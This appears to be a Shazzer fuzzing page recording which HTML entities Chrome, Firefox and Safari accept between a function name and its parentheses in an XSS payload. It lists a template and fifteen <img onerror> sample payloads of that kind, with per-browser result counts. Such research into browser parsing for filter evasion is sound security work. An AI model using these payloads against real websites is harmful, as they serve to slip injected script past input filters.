Entities allowed between function calls

Chrome logo 8
Firefox logo 4
Safari logo 2

This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are a bit inconsistent yet because I currently wait for page load.

Created by: hackvertor

Created on: Saturday, June 29, 2024 at 1:55:26 PM

Updated on: Friday, December 6, 2024 at 9:56:55 PM

Vector type: XSS

Vector charset: UTF-8

Template used:
<img src=data: onerror="log$[data1]('html($[data1])')">
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<img src=data: onerror="alert&ThinSpace;('&#38;ThinSpace;')">
<img src=data: onerror="alert&puncsp;('&#38;puncsp;')">
<img src=data: onerror="alert&MediumSpace;('&#38;MediumSpace;')">
<img src=data: onerror="alert&thinsp;('&#38;thinsp;')">
<img src=data: onerror="alert&hairsp;('&#38;hairsp;')">
<img src=data: onerror="alert&emsp;('&#38;emsp;')">
<img src=data: onerror="alert&NonBreakingSpace;('&#38;NonBreakingSpace;')">
<img src=data: onerror="alert&NewLine;('&#38;NewLine;')">
<img src=data: onerror="alert&emsp13;('&#38;emsp13;')">
<img src=data: onerror="alert&emsp14;('&#38;emsp14;')">
<img src=data: onerror="alert&ensp;('&#38;ensp;')">
<img src=data: onerror="alert&Tab;('&#38;Tab;')">
<img src=data: onerror="alert&nbsp;('&#38;nbsp;')">
<img src=data: onerror="alert&numsp;('&#38;numsp;')">
<img src=data: onerror="alert&VeryThinSpace;('&#38;VeryThinSpace;')">

Fuzz results

Chrome logo
Chrome 126.0.0.0 desktop macOS 10.15.7

Updated

Sat Jun 29 2024
Found 8 results
Loading...
Firefox logo
Firefox 127.0 desktop macOS 10.15

Updated

Sat Jun 29 2024
Found 4 results
Loading...
Safari logo
Safari 17.4 desktop macOS 10.15.7

Updated

Sat Jun 29 2024
Found 2 results
Loading...
Safari logo
Safari 17.5 mobile iOS 17.5.1

Updated

Sun Jun 30 2024
Found 6 results
Loading...